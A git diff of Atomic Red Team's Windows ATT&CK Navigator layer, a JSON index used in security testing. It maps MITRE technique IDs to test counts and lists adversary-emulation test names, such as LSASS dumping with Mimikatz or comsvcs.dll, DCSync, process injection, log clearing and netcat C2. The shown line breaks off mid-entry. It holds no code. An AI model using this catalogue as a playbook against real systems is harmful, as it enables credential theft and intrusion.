diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 09b30f3e..7bef6d49 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1033","score":5,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":4,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"comment":"\n- C2 Data Exfiltration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"comment":"\n- Process Injection via C#\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View 